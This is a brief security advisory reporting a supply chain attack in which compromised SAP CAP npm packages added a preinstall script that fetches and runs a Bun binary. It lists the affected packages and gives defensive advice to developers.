Socket's threat research team has identified a supply chain attack targeting multiple SAP CAP npm packages. Compromised versions of mbt, @cap-js/sqlite, @cap-js/postgres, and @cap-js/db-service introduced a preinstall script that downloads and executes an unverified Bun binary from GitHub Releases. The attack follows HTTP redirects without validation and uses PowerShell with ExecutionPolicy Bypass on Windows. Combined weekly downloads of affected packages exceed 570,000. All suspicious versions were published on April 29, 2026 within a few hours. Developers are advised to audit dependency trees, avoid the affected versions, rotate exposed credentials, and review CI/CD logs for unexpected binary execution.
Sort: